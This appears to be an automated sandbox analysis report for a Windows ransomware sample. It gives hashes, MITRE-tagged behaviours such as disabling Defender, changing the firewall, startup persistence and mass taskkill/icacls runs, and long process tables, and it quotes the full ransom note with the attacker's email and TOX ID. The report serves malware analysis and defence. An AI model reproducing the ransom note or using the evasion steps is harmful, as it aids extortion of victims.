2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
133s
max time network
147s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Size

367KB
MD5

b31f6216e6bc5a6291a0b82de0377553
SHA1

0afdc5359268f7e78a0ca3c3c67752edd304a742
SHA256

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb
SHA512

7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Hello. Your files, documents, photo, databases and all the rest aren't REMOVED. They are ciphered by the most reliable enciphering. It is impossible to restore files without our help. You will try to restore files independent you will lose files FOREVER. ---------------------------------------------------------- You will be able to restore files so: 1. to contact us by e-mail: filesrestore000@msgsafe.io * report your ID and we will switch off any removal of files (if don't report your ID identifier, then each 24 hours will be to be removed on 24 files. If report to ID-we will switch off it) * you send your ID identifier and 2 files, up to 2 MB in size everyone. We decipher them, as proof of a possibility of interpretation. also you receive the instruction where and how many it is necessary to pay. 2. you pay and confirm payment. 3. after payment you receive the DECODER program. which you restore ALL YOUR FILES. ---------------------------------------------------------- If you have not been answered within 24 hours by mail, use the backup link. To do this: 1. Download TOX at https ://tox.chat/clients.html 2. Sign up (takes 1 minute) 3. Add a contact. Our TOX contact - B9131B8B3AAB24F72F0DBB1783AB54231E1756277455F52BC404AD769BF83B372F13A039708F You have 72 hours on payment. If you don't manage to pay in 72 hours, then the price of interpretation increases twice. The price increases twice each 72 hours. To restore files, without loss, and on the minimum tariff, you have to pay within 72 hours. Address for detailed instructions e-mail: filesrestore000@msgsafe.io If you don't waste time for attempts to decipher, then you will be able to restore all files in 1 hour. If you try to decipher - you can FOREVER lose your files. Key Identifier: i4owRhbeLHl50VZKaHHkoZFP0ebjIfqQnoe2zf6ziooPwo9MW9OmubGukHsn+ex0KZjeLk0aT1/mUC5AnanHFocxgIoXL0o2lnRUqf40g5C3kNbVhxYn3OyldNOY9l0d8eFx3/oA6RqLi8O4uqiTbFiMCJhBwn3/v4jjLW5hVFw2GuIsFp7ZizmCxb5axs15dz3Ogrg+EDv+3mH0SQwgRAQDzPKNfOxAkJuMMObVCieCWBKVeBXlI+Vtak3HGzChWrvmmj+tJ9b8Qxokp6rjlZvyUOmYojtw0XyMsOmGGP4sritoAQfpF9bs1JzWrbdhFhA9MImV6U2kAmBlQcjWS4Stuc9Xqwyk7cG4JYiSqkDBBUaA5nH2yeDIoWYJVnX2/XvgzR5YYFpQB+Zh3f7gpa7oT+2mZwoUxSYmnwYllw3k2mQ9NXgc2xeWj3DXjziZvbnS8r0tXVTHTaoj+Zj+EQc2GVkSUTLKQEJXkulP3vuHjfMJpXHyYx/gH1WRaKLFVZOZw5SxULBOdrTZZUXHaV6fc4dJjzZNVceMVo3oAfs+U8zWqgjRHIYH7yGr3dG5NWlOfgawFsG0uiSM6emBsTgch5wdcr8Ze63hOn/j5mq6WVsQr1ZNnpCEBNQ+JkZJtucnctebITOLHbmefSF7f/H/vipZzzPwkyfE2bPPW8M=

Emails

filesrestore000@msgsafe.io

URLs

https

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Modifies file permissions 1 TTPs 36 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1248	icacls.exe
1764	icacls.exe
1052	icacls.exe
1596	icacls.exe
652	icacls.exe
1756	icacls.exe
892	icacls.exe
760	icacls.exe
1616	icacls.exe
1648	icacls.exe
968	icacls.exe
1856	icacls.exe
840	icacls.exe
1776	icacls.exe
340	icacls.exe
340	icacls.exe
1248	icacls.exe
1960	icacls.exe
560	icacls.exe
668	icacls.exe
860	icacls.exe
1144	icacls.exe
1012	icacls.exe
776	icacls.exe
800	icacls.exe
1912	icacls.exe
644	icacls.exe
1760	icacls.exe
756	icacls.exe
824	icacls.exe
1160	icacls.exe
1068	icacls.exe
1568	icacls.exe
1648	icacls.exe
644	icacls.exe
1100	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Attention Attention Attention!"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Good afternoon. Do you have any difficulties at work?\r\nDo not worry, our IT specialists will help you.\r\nTo do this, please email us.\r\n\r\nOur email - filesrestore000@msgsafe.io"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 54 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
932	taskkill.exe
1176	taskkill.exe
1704	taskkill.exe
1248	taskkill.exe
2024	taskkill.exe
1208	taskkill.exe
532	taskkill.exe
1472	taskkill.exe
1556	taskkill.exe
1368	taskkill.exe
1932	taskkill.exe
644	taskkill.exe
776	taskkill.exe
1144	taskkill.exe
932	taskkill.exe
1012	taskkill.exe
1300	taskkill.exe
1348	taskkill.exe
1616	taskkill.exe
1932	taskkill.exe
1924	taskkill.exe
1208	taskkill.exe
1012	taskkill.exe
1348	taskkill.exe
956	taskkill.exe
1276	taskkill.exe
788	taskkill.exe
1944	taskkill.exe
1348	taskkill.exe
1208	taskkill.exe
652	taskkill.exe
1432	taskkill.exe
1160	taskkill.exe
1704	taskkill.exe
1424	taskkill.exe
1472	taskkill.exe
956	taskkill.exe
1944	taskkill.exe
1308	taskkill.exe
1652	taskkill.exe
756	taskkill.exe
1716	taskkill.exe
1176	taskkill.exe
1596	taskkill.exe
328	taskkill.exe
1612	taskkill.exe
968	taskkill.exe
668	taskkill.exe
1704	taskkill.exe
800	taskkill.exe
1276	taskkill.exe
1596	taskkill.exe
2024	taskkill.exe
1184	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1308 reg.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1944 PING.EXE
644 PING.EXE
328 PING.EXE

pid	process
1308	reg.exe

pid	process
1944	PING.EXE
644	PING.EXE
328	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

pid	process
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exePING.EXEtaskkill.exearp.exetaskkill.exetaskkill.exetaskkill.execonhost.execonhost.exetaskkill.execonhost.execonhost.execonhost.exetaskkill.exetaskkill.exePING.EXEpowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exeicacls.execonhost.exeicacls.exetaskkill.exetaskkill.exeicacls.exenetsh.execonhost.exetaskkill.exetaskkill.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Token: SeDebugPrivilege	1480
Token: SeDebugPrivilege	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Token: SeDebugPrivilege	644	PING.EXE
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	328	arp.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	776	conhost.exe
Token: SeDebugPrivilege	1012	conhost.exe
Token: SeDebugPrivilege	788	taskkill.exe
Token: SeDebugPrivilege	668	conhost.exe
Token: SeDebugPrivilege	1704	conhost.exe
Token: SeDebugPrivilege	2024	conhost.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	800	taskkill.exe
Token: SeDebugPrivilege	1944	PING.EXE
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1012	conhost.exe
Token: SeDebugPrivilege	1596	cmd.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	1932	cmd.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1704	conhost.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1368	conhost.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	1248	icacls.exe
Token: SeDebugPrivilege	532	conhost.exe
Token: SeDebugPrivilege	1616	icacls.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	1944	PING.EXE
Token: SeDebugPrivilege	1144	icacls.exe
Token: SeDebugPrivilege	1160	netsh.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	1932	cmd.exe
Token: SeDebugPrivilege	1704	conhost.exe
Token: SeDebugPrivilege	1652	conhost.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	1596	cmd.exe
Token: SeDebugPrivilege	2024	conhost.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	1752	conhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

pid process

1084 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

pid process

1084 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

description	pid	process	target process
PID 1084 wrote to memory of 396	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	powershell.exe
PID 1084 wrote to memory of 396	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	powershell.exe
PID 1084 wrote to memory of 396	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	powershell.exe
PID 1084 wrote to memory of 1480	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	powershell.exe
PID 1084 wrote to memory of 1480	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	powershell.exe
PID 1084 wrote to memory of 1480	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	powershell.exe
PID 1084 wrote to memory of 644	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	PING.EXE
PID 1084 wrote to memory of 644	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	PING.EXE
PID 1084 wrote to memory of 644	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	PING.EXE
PID 1084 wrote to memory of 1704	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1704	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1704	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1308	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1308	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1308	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1176	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1176	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1176	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 860	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	netsh.exe
PID 1084 wrote to memory of 860	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	netsh.exe
PID 1084 wrote to memory of 860	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	netsh.exe
PID 1084 wrote to memory of 1204	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1204	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1204	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1248	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	icacls.exe
PID 1084 wrote to memory of 1248	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	icacls.exe
PID 1084 wrote to memory of 1248	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	icacls.exe
PID 1084 wrote to memory of 672	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 672	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 672	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 544	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	netsh.exe
PID 1084 wrote to memory of 544	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	netsh.exe
PID 1084 wrote to memory of 544	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	netsh.exe
PID 1084 wrote to memory of 1348	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1348	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1348	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1540	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	sc.exe
PID 1084 wrote to memory of 1540	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	sc.exe
PID 1084 wrote to memory of 1540	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	sc.exe
PID 1084 wrote to memory of 788	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 788	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 788	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 968	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 968	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 968	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1996	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1996	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1996	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	conhost.exe
PID 1084 wrote to memory of 1208	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1208	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1208	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 956	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 956	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 956	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
